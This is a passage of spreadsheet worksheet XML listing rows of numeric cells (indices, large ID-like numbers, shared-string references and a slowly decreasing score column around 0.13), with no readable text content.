    <row r="3068" ht="15.75" customHeight="1">
      <c r="A3068" s="1">
        <v>3087.0</v>
      </c>
      <c r="B3068" s="2">
        <v>3.6651468E7</v>
      </c>
      <c r="C3068" s="2" t="s">
        <v>2876</v>
      </c>
      <c r="D3068" s="2">
        <v>1.0</v>
      </c>
      <c r="E3068" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3068" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3069" ht="15.75" customHeight="1">
      <c r="A3069" s="1">
        <v>3513.0</v>
      </c>
      <c r="B3069" s="2">
        <v>3.8565203E7</v>
      </c>
      <c r="C3069" s="2" t="s">
        <v>2877</v>
      </c>
      <c r="D3069" s="2">
        <v>1.0</v>
      </c>
      <c r="E3069" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3069" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3070" ht="15.75" customHeight="1">
      <c r="A3070" s="1">
        <v>3809.0</v>
      </c>
      <c r="B3070" s="2">
        <v>4.0058803E7</v>
      </c>
      <c r="C3070" s="2" t="s">
        <v>2878</v>
      </c>
      <c r="D3070" s="2">
        <v>1.0</v>
      </c>
      <c r="E3070" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3070" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3071" ht="15.75" customHeight="1">
      <c r="A3071" s="1">
        <v>6275.0</v>
      </c>
      <c r="B3071" s="2">
        <v>4.8142217E7</v>
      </c>
      <c r="C3071" s="2" t="s">
        <v>2879</v>
      </c>
      <c r="D3071" s="2">
        <v>1.0</v>
      </c>
      <c r="E3071" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3071" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3072" ht="15.75" customHeight="1">
      <c r="A3072" s="1">
        <v>7363.0</v>
      </c>
      <c r="B3072" s="2">
        <v>5.101947E7</v>
      </c>
      <c r="C3072" s="2" t="s">
        <v>2880</v>
      </c>
      <c r="D3072" s="2">
        <v>1.0</v>
      </c>
      <c r="E3072" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3072" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3073" ht="15.75" customHeight="1">
      <c r="A3073" s="1">
        <v>10678.0</v>
      </c>
      <c r="B3073" s="2">
        <v>1.4588337E7</v>
      </c>
      <c r="C3073" s="2" t="s">
        <v>2881</v>
      </c>
      <c r="D3073" s="2">
        <v>1.0</v>
      </c>
      <c r="E3073" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3073" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3074" ht="15.75" customHeight="1">
      <c r="A3074" s="1">
        <v>10921.0</v>
      </c>
      <c r="B3074" s="2">
        <v>1.6734256E7</v>
      </c>
      <c r="C3074" s="2" t="s">
        <v>2882</v>
      </c>
      <c r="D3074" s="2">
        <v>1.0</v>
      </c>
      <c r="E3074" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3074" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3075" ht="15.75" customHeight="1">
      <c r="A3075" s="1">
        <v>11138.0</v>
      </c>
      <c r="B3075" s="2">
        <v>1.9236631E7</v>
      </c>
      <c r="C3075" s="2" t="s">
        <v>2883</v>
      </c>
      <c r="D3075" s="2">
        <v>1.0</v>
      </c>
      <c r="E3075" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3075" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3076" ht="15.75" customHeight="1">
      <c r="A3076" s="1">
        <v>11500.0</v>
      </c>
      <c r="B3076" s="2">
        <v>2.2087962E7</v>
      </c>
      <c r="C3076" s="2" t="s">
        <v>2884</v>
      </c>
      <c r="D3076" s="2">
        <v>1.0</v>
      </c>
      <c r="E3076" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3076" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3077" ht="15.75" customHeight="1">
      <c r="A3077" s="1">
        <v>12003.0</v>
      </c>
      <c r="B3077" s="2">
        <v>2.5961838E7</v>
      </c>
      <c r="C3077" s="2" t="s">
        <v>2885</v>
      </c>
      <c r="D3077" s="2">
        <v>1.0</v>
      </c>
      <c r="E3077" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3077" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3078" ht="15.75" customHeight="1">
      <c r="A3078" s="1">
        <v>12205.0</v>
      </c>
      <c r="B3078" s="2">
        <v>2.7535361E7</v>
      </c>
      <c r="C3078" s="2" t="s">
        <v>2886</v>
      </c>
      <c r="D3078" s="2">
        <v>1.0</v>
      </c>
      <c r="E3078" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3078" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3079" ht="15.75" customHeight="1">
      <c r="A3079" s="1">
        <v>13227.0</v>
      </c>
      <c r="B3079" s="2">
        <v>3.4232252E7</v>
      </c>
      <c r="C3079" s="2" t="s">
        <v>2887</v>
      </c>
      <c r="D3079" s="2">
        <v>1.0</v>
      </c>
      <c r="E3079" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3079" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3080" ht="15.75" customHeight="1">
      <c r="A3080" s="1">
        <v>13356.0</v>
      </c>
      <c r="B3080" s="2">
        <v>3.4735541E7</v>
      </c>
      <c r="C3080" s="2" t="s">
        <v>2888</v>
      </c>
      <c r="D3080" s="2">
        <v>1.0</v>
      </c>
      <c r="E3080" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3080" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3081" ht="15.75" customHeight="1">
      <c r="A3081" s="1">
        <v>14594.0</v>
      </c>
      <c r="B3081" s="2">
        <v>4.0216327E7</v>
      </c>
      <c r="C3081" s="2" t="s">
        <v>2889</v>
      </c>
      <c r="D3081" s="2">
        <v>1.0</v>
      </c>
      <c r="E3081" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3081" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3082" ht="15.75" customHeight="1">
      <c r="A3082" s="1">
        <v>15089.0</v>
      </c>
      <c r="B3082" s="2">
        <v>4.1779336E7</v>
      </c>
      <c r="C3082" s="2" t="s">
        <v>2890</v>
      </c>
      <c r="D3082" s="2">
        <v>1.0</v>
      </c>
      <c r="E3082" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3082" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3083" ht="15.75" customHeight="1">
      <c r="A3083" s="1">
        <v>18714.0</v>
      </c>
      <c r="B3083" s="2">
        <v>5.3660235E7</v>
      </c>
      <c r="C3083" s="2" t="s">
        <v>2891</v>
      </c>
      <c r="D3083" s="2">
        <v>1.0</v>
      </c>
      <c r="E3083" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3083" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="3084" ht="15.75" customHeight="1">
      <c r="A3084" s="1">
        <v>9852.0</v>
      </c>
      <c r="B3084" s="2">
        <v>5.6696428E7</v>
      </c>
      <c r="C3084" s="2" t="s">
        <v>2892</v>
      </c>
      <c r="D3084" s="2">
        <v>1.0</v>
      </c>
      <c r="E3084" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3084" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="3085" ht="15.75" customHeight="1">
      <c r="A3085" s="1">
        <v>1641.0</v>
      </c>
      <c r="B3085" s="2">
        <v>2.8031274E7</v>
      </c>
      <c r="C3085" s="2" t="s">
        <v>2893</v>
      </c>
      <c r="D3085" s="2">
        <v>1.0</v>
      </c>
      <c r="E3085" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3085" s="2">
        <v>0.1322378716744914</v>
      </c>
    </row>
    <row r="3086" ht="15.75" customHeight="1">
      <c r="A3086" s="1">
        <v>5528.0</v>
      </c>
      <c r="B3086" s="2">
        <v>4.5876583E7</v>
      </c>
      <c r="C3086" s="2" t="s">
        <v>2894</v>
      </c>
      <c r="D3086" s="2">
        <v>1.0</v>
      </c>
      <c r="E3086" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3086" s="2">
        <v>0.1322378716744914</v>
      </c>
    </row>
    <row r="3087" ht="15.75" customHeight="1">
      <c r="A3087" s="1">
        <v>3149.0</v>
      </c>
      <c r="B3087" s="2">
        <v>3.6970977E7</v>
      </c>
      <c r="C3087" s="2" t="s">
        <v>2895</v>
      </c>
      <c r="D3087" s="2">
        <v>1.0</v>
      </c>
      <c r="E3087" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3087" s="2">
        <v>0.1321548821548822</v>
      </c>
    </row>
    <row r="3088" ht="15.75" customHeight="1">
      <c r="A3088" s="1">
        <v>5218.0</v>
      </c>
      <c r="B3088" s="2">
        <v>4.4967826E7</v>
      </c>
      <c r="C3088" s="2" t="s">
        <v>2896</v>
      </c>
      <c r="D3088" s="2">
        <v>1.0</v>
      </c>
      <c r="E3088" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3088" s="2">
        <v>0.1321548821548822</v>
      </c>
    </row>
    <row r="3089" ht="15.75" customHeight="1">
      <c r="A3089" s="1">
        <v>1884.0</v>
      </c>
      <c r="B3089" s="2">
        <v>2.9778062E7</v>
      </c>
      <c r="C3089" s="2" t="s">
        <v>2897</v>
      </c>
      <c r="D3089" s="2">
        <v>1.0</v>
      </c>
      <c r="E3089" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3089" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="3090" ht="15.75" customHeight="1">
      <c r="A3090" s="1">
        <v>2362.0</v>
      </c>
      <c r="B3090" s="2">
        <v>3.3232873E7</v>
      </c>
      <c r="C3090" s="2" t="s">
        <v>2898</v>
      </c>
      <c r="D3090" s="2">
        <v>1.0</v>
      </c>
      <c r="E3090" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3090" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="3091" ht="15.75" customHeight="1">
      <c r="A3091" s="1">
        <v>9041.0</v>
      </c>
      <c r="B3091" s="2">
        <v>5.5053027E7</v>
      </c>
      <c r="C3091" s="2" t="s">
        <v>2899</v>
      </c>
      <c r="D3091" s="2">
        <v>1.0</v>
      </c>
      <c r="E3091" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3091" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="3092" ht="15.75" customHeight="1">
      <c r="A3092" s="1">
        <v>33707.0</v>
      </c>
      <c r="B3092" s="2">
        <v>8489081.0</v>
      </c>
      <c r="C3092" s="2" t="s">
        <v>2900</v>
      </c>
      <c r="D3092" s="2">
        <v>1.0</v>
      </c>
      <c r="E3092" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3092" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="3093" ht="15.75" customHeight="1">
      <c r="A3093" s="1">
        <v>8867.0</v>
      </c>
      <c r="B3093" s="2">
        <v>5.4745576E7</v>
      </c>
      <c r="C3093" s="2" t="s">
        <v>2901</v>
      </c>
      <c r="D3093" s="2">
        <v>1.0</v>
      </c>
      <c r="E3093" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3093" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="3094" ht="15.75" customHeight="1">
      <c r="A3094" s="1">
        <v>7682.0</v>
      </c>
      <c r="B3094" s="2">
        <v>5.193387E7</v>
      </c>
      <c r="C3094" s="2" t="s">
        <v>2902</v>
      </c>
      <c r="D3094" s="2">
        <v>1.0</v>
      </c>
      <c r="E3094" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3094" s="2">
        <v>0.1318407960199005</v>
      </c>
    </row>
    <row r="3095" ht="15.75" customHeight="1">
      <c r="A3095" s="1">
        <v>6708.0</v>
      </c>
      <c r="B3095" s="2">
        <v>4.923672E7</v>
      </c>
      <c r="C3095" s="2" t="s">
        <v>2903</v>
      </c>
      <c r="D3095" s="2">
        <v>1.0</v>
      </c>
      <c r="E3095" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3095" s="2">
        <v>0.1317663817663818</v>
      </c>
    </row>
    <row r="3096" ht="15.75" customHeight="1">
      <c r="A3096" s="1">
        <v>2821.0</v>
      </c>
      <c r="B3096" s="2">
        <v>3.5391091E7</v>
      </c>
      <c r="C3096" s="2" t="s">
        <v>2904</v>
      </c>
      <c r="D3096" s="2">
        <v>1.0</v>
      </c>
      <c r="E3096" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3096" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="3097" ht="15.75" customHeight="1">
      <c r="A3097" s="1">
        <v>4745.0</v>
      </c>
      <c r="B3097" s="2">
        <v>4.3372802E7</v>
      </c>
      <c r="C3097" s="2" t="s">
        <v>2905</v>
      </c>
      <c r="D3097" s="2">
        <v>1.0</v>
      </c>
      <c r="E3097" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3097" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="3098" ht="15.75" customHeight="1">
      <c r="A3098" s="1">
        <v>4626.0</v>
      </c>
      <c r="B3098" s="2">
        <v>4.2978771E7</v>
      </c>
      <c r="C3098" s="2" t="s">
        <v>2906</v>
      </c>
      <c r="D3098" s="2">
        <v>1.0</v>
      </c>
      <c r="E3098" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3098" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="3099" ht="15.75" customHeight="1">
      <c r="A3099" s="1">
        <v>8632.0</v>
      </c>
      <c r="B3099" s="2">
        <v>5.43182E7</v>
      </c>
      <c r="C3099" s="2" t="s">
        <v>2907</v>
      </c>
      <c r="D3099" s="2">
        <v>1.0</v>
      </c>
      <c r="E3099" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3099" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="3100" ht="15.75" customHeight="1">
      <c r="A3100" s="1">
        <v>11764.0</v>
      </c>
      <c r="B3100" s="2">
        <v>2.4193947E7</v>
      </c>
      <c r="C3100" s="2" t="s">
        <v>2908</v>
      </c>
      <c r="D3100" s="2">
        <v>1.0</v>
      </c>
      <c r="E3100" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3100" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="3101" ht="15.75" customHeight="1">
      <c r="A3101" s="1">
        <v>19033.0</v>
      </c>
      <c r="B3101" s="2">
        <v>5.4555774E7</v>
      </c>
      <c r="C3101" s="2" t="s">
        <v>2909</v>
      </c>
      <c r="D3101" s="2">
        <v>1.0</v>
      </c>
      <c r="E3101" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3101" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="3102" ht="15.75" customHeight="1">
      <c r="A3102" s="1">
        <v>30821.0</v>
      </c>
      <c r="B3102" s="2">
        <v>4.5372738E7</v>
      </c>
      <c r="C3102" s="2" t="s">
        <v>2910</v>
      </c>
      <c r="D3102" s="2">
        <v>1.0</v>
      </c>
      <c r="E3102" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3102" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="3103" ht="15.75" customHeight="1">
      <c r="A3103" s="1">
        <v>5867.0</v>
      </c>
      <c r="B3103" s="2">
        <v>4.7003158E7</v>
      </c>
      <c r="C3103" s="2" t="s">
        <v>2911</v>
      </c>
      <c r="D3103" s="2">
        <v>1.0</v>
      </c>
      <c r="E3103" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3103" s="2">
        <v>0.1315359477124184</v>
      </c>
    </row>
    <row r="3104" ht="15.75" customHeight="1">
      <c r="A3104" s="1">
        <v>7277.0</v>
      </c>
      <c r="B3104" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C3104" s="2" t="s">
        <v>2912</v>
      </c>
      <c r="D3104" s="2">
        <v>1.0</v>
      </c>
      <c r="E3104" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3104" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="3105" ht="15.75" customHeight="1">
      <c r="A3105" s="1">
        <v>11499.0</v>
      </c>
      <c r="B3105" s="2">
        <v>2.2087962E7</v>
      </c>
      <c r="C3105" s="2" t="s">
        <v>2913</v>
      </c>
      <c r="D3105" s="2">
        <v>1.0</v>
      </c>
      <c r="E3105" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3105" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="3106" ht="15.75" customHeight="1">
      <c r="A3106" s="1">
        <v>689.0</v>
      </c>
      <c r="B3106" s="2">
        <v>2.0336129E7</v>
      </c>
      <c r="C3106" s="2" t="s">
        <v>2914</v>
      </c>
      <c r="D3106" s="2">
        <v>1.0</v>
      </c>
      <c r="E3106" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3106" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="3107" ht="15.75" customHeight="1">
      <c r="A3107" s="1">
        <v>9282.0</v>
      </c>
      <c r="B3107" s="2">
        <v>5.552118E7</v>
      </c>
      <c r="C3107" s="2" t="s">
        <v>2915</v>
      </c>
      <c r="D3107" s="2">
        <v>1.0</v>
      </c>
      <c r="E3107" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3107" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="3108" ht="15.75" customHeight="1">
      <c r="A3108" s="1">
        <v>7794.0</v>
      </c>
      <c r="B3108" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C3108" s="2" t="s">
        <v>2916</v>
      </c>
      <c r="D3108" s="2">
        <v>1.0</v>
      </c>
      <c r="E3108" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3108" s="2">
        <v>0.131076388888889</v>
      </c>
    </row>
    <row r="3109" ht="15.75" customHeight="1">
      <c r="A3109" s="1">
        <v>6786.0</v>
      </c>
      <c r="B3109" s="2">
        <v>4.9491977E7</v>
      </c>
      <c r="C3109" s="2" t="s">
        <v>2917</v>
      </c>
      <c r="D3109" s="2">
        <v>1.0</v>
      </c>
      <c r="E3109" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3109" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="3110" ht="15.75" customHeight="1">
      <c r="A3110" s="1">
        <v>1380.0</v>
      </c>
      <c r="B3110" s="2">
        <v>2.6085289E7</v>
      </c>
      <c r="C3110" s="2" t="s">
        <v>2918</v>
      </c>
      <c r="D3110" s="2">
        <v>1.0</v>
      </c>
      <c r="E3110" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3110" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="3111" ht="15.75" customHeight="1">
      <c r="A3111" s="1">
        <v>6948.0</v>
      </c>
      <c r="B3111" s="2">
        <v>4.9952487E7</v>
      </c>
      <c r="C3111" s="2" t="s">
        <v>2919</v>
      </c>
      <c r="D3111" s="2">
        <v>1.0</v>
      </c>
      <c r="E3111" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3111" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="3112" ht="15.75" customHeight="1">
      <c r="A3112" s="1">
        <v>15625.0</v>
      </c>
      <c r="B3112" s="2">
        <v>4.3558347E7</v>
      </c>
      <c r="C3112" s="2" t="s">
        <v>2920</v>
      </c>
      <c r="D3112" s="2">
        <v>1.0</v>
      </c>
      <c r="E3112" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3112" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="3113" ht="15.75" customHeight="1">
      <c r="A3113" s="1">
        <v>154.0</v>
      </c>
      <c r="B3113" s="2">
        <v>1.3689486E7</v>
      </c>
      <c r="C3113" s="2" t="s">
        <v>2921</v>
      </c>
      <c r="D3113" s="2">
        <v>1.0</v>
      </c>
      <c r="E3113" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3113" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3114" ht="15.75" customHeight="1">
      <c r="A3114" s="1">
        <v>6194.0</v>
      </c>
      <c r="B3114" s="2">
        <v>4.7943997E7</v>
      </c>
      <c r="C3114" s="2" t="s">
        <v>2922</v>
      </c>
      <c r="D3114" s="2">
        <v>1.0</v>
      </c>
      <c r="E3114" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3114" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3115" ht="15.75" customHeight="1">
      <c r="A3115" s="1">
        <v>7079.0</v>
      </c>
      <c r="B3115" s="2">
        <v>5.0261767E7</v>
      </c>
      <c r="C3115" s="2" t="s">
        <v>2923</v>
      </c>
      <c r="D3115" s="2">
        <v>1.0</v>
      </c>
      <c r="E3115" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3115" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3116" ht="15.75" customHeight="1">
      <c r="A3116" s="1">
        <v>9862.0</v>
      </c>
      <c r="B3116" s="2">
        <v>5.6715695E7</v>
      </c>
      <c r="C3116" s="2" t="s">
        <v>2924</v>
      </c>
      <c r="D3116" s="2">
        <v>1.0</v>
      </c>
      <c r="E3116" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3116" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3117" ht="15.75" customHeight="1">
      <c r="A3117" s="1">
        <v>11004.0</v>
      </c>
      <c r="B3117" s="2">
        <v>1.7669264E7</v>
      </c>
      <c r="C3117" s="2" t="s">
        <v>2925</v>
      </c>
      <c r="D3117" s="2">
        <v>1.0</v>
      </c>
      <c r="E3117" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3117" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3118" ht="15.75" customHeight="1">
      <c r="A3118" s="1">
        <v>11226.0</v>
      </c>
      <c r="B3118" s="2">
        <v>2.0314115E7</v>
      </c>
      <c r="C3118" s="2" t="s">
        <v>2926</v>
      </c>
      <c r="D3118" s="2">
        <v>1.0</v>
      </c>
      <c r="E3118" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3118" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3119" ht="15.75" customHeight="1">
      <c r="A3119" s="1">
        <v>16008.0</v>
      </c>
      <c r="B3119" s="2">
        <v>4.499159E7</v>
      </c>
      <c r="C3119" s="2" t="s">
        <v>2927</v>
      </c>
      <c r="D3119" s="2">
        <v>1.0</v>
      </c>
      <c r="E3119" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3119" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3120" ht="15.75" customHeight="1">
      <c r="A3120" s="1">
        <v>19814.0</v>
      </c>
      <c r="B3120" s="2">
        <v>5.6950909E7</v>
      </c>
      <c r="C3120" s="2" t="s">
        <v>2928</v>
      </c>
      <c r="D3120" s="2">
        <v>1.0</v>
      </c>
      <c r="E3120" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3120" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="3121" ht="15.75" customHeight="1">
      <c r="A3121" s="1">
        <v>2566.0</v>
      </c>
      <c r="B3121" s="2">
        <v>3.4239189E7</v>
      </c>
      <c r="C3121" s="2" t="s">
        <v>2929</v>
      </c>
      <c r="D3121" s="2">
        <v>1.0</v>
      </c>
      <c r="E3121" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3121" s="2">
        <v>0.1305555555555555</v>
      </c>
    </row>
    <row r="3122" ht="15.75" customHeight="1">
      <c r="A3122" s="1">
        <v>12491.0</v>
      </c>
      <c r="B3122" s="2">
        <v>2.9536621E7</v>
      </c>
      <c r="C3122" s="2" t="s">
        <v>2930</v>
      </c>
      <c r="D3122" s="2">
        <v>1.0</v>
      </c>
      <c r="E3122" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3122" s="2">
        <v>0.1304713804713805</v>
      </c>
    </row>
    <row r="3123" ht="15.75" customHeight="1">
      <c r="A3123" s="1">
        <v>405.0</v>
      </c>
      <c r="B3123" s="2">
        <v>1.6682022E7</v>
      </c>
      <c r="C3123" s="2" t="s">
        <v>2931</v>
      </c>
      <c r="D3123" s="2">
        <v>1.0</v>
      </c>
      <c r="E3123" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3123" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3124" ht="15.75" customHeight="1">
      <c r="A3124" s="1">
        <v>451.0</v>
      </c>
      <c r="B3124" s="2">
        <v>1.7216264E7</v>
      </c>
      <c r="C3124" s="2" t="s">
        <v>2932</v>
      </c>
      <c r="D3124" s="2">
        <v>1.0</v>
      </c>
      <c r="E3124" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3124" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3125" ht="15.75" customHeight="1">
      <c r="A3125" s="1">
        <v>858.0</v>
      </c>
      <c r="B3125" s="2">
        <v>2.175175E7</v>
      </c>
      <c r="C3125" s="2" t="s">
        <v>2933</v>
      </c>
      <c r="D3125" s="2">
        <v>1.0</v>
      </c>
      <c r="E3125" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3125" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3126" ht="15.75" customHeight="1">
      <c r="A3126" s="1">
        <v>896.0</v>
      </c>
      <c r="B3126" s="2">
        <v>2.2047795E7</v>
      </c>
      <c r="C3126" s="2" t="s">
        <v>2934</v>
      </c>
      <c r="D3126" s="2">
        <v>1.0</v>
      </c>
      <c r="E3126" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3126" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3127" ht="15.75" customHeight="1">
      <c r="A3127" s="1">
        <v>993.0</v>
      </c>
      <c r="B3127" s="2">
        <v>2.291338E7</v>
      </c>
      <c r="C3127" s="2" t="s">
        <v>2935</v>
      </c>
      <c r="D3127" s="2">
        <v>1.0</v>
      </c>
      <c r="E3127" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3127" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3128" ht="15.75" customHeight="1">
      <c r="A3128" s="1">
        <v>1007.0</v>
      </c>
      <c r="B3128" s="2">
        <v>2.3057337E7</v>
      </c>
      <c r="C3128" s="2" t="s">
        <v>2936</v>
      </c>
      <c r="D3128" s="2">
        <v>1.0</v>
      </c>
      <c r="E3128" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3128" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3129" ht="15.75" customHeight="1">
      <c r="A3129" s="1">
        <v>1741.0</v>
      </c>
      <c r="B3129" s="2">
        <v>2.8802263E7</v>
      </c>
      <c r="C3129" s="2" t="s">
        <v>2937</v>
      </c>
      <c r="D3129" s="2">
        <v>1.0</v>
      </c>
      <c r="E3129" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3129" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3130" ht="15.75" customHeight="1">
      <c r="A3130" s="1">
        <v>1890.0</v>
      </c>
      <c r="B3130" s="2">
        <v>2.9838533E7</v>
      </c>
      <c r="C3130" s="2" t="s">
        <v>2938</v>
      </c>
      <c r="D3130" s="2">
        <v>1.0</v>
      </c>
      <c r="E3130" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3130" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3131" ht="15.75" customHeight="1">
      <c r="A3131" s="1">
        <v>2569.0</v>
      </c>
      <c r="B3131" s="2">
        <v>3.4243734E7</v>
      </c>
      <c r="C3131" s="2" t="s">
        <v>2939</v>
      </c>
      <c r="D3131" s="2">
        <v>1.0</v>
      </c>
      <c r="E3131" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3131" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3132" ht="15.75" customHeight="1">
      <c r="A3132" s="1">
        <v>3692.0</v>
      </c>
      <c r="B3132" s="2">
        <v>3.9521541E7</v>
      </c>
      <c r="C3132" s="2" t="s">
        <v>2940</v>
      </c>
      <c r="D3132" s="2">
        <v>1.0</v>
      </c>
      <c r="E3132" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3132" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3133" ht="15.75" customHeight="1">
      <c r="A3133" s="1">
        <v>4043.0</v>
      </c>
      <c r="B3133" s="2">
        <v>4.1056448E7</v>
      </c>
      <c r="C3133" s="2" t="s">
        <v>2941</v>
      </c>
      <c r="D3133" s="2">
        <v>1.0</v>
      </c>
      <c r="E3133" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3133" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3134" ht="15.75" customHeight="1">
      <c r="A3134" s="1">
        <v>6147.0</v>
      </c>
      <c r="B3134" s="2">
        <v>4.7835781E7</v>
      </c>
      <c r="C3134" s="2" t="s">
        <v>2942</v>
      </c>
      <c r="D3134" s="2">
        <v>1.0</v>
      </c>
      <c r="E3134" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3134" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="3135" ht="15.75" customHeight="1">
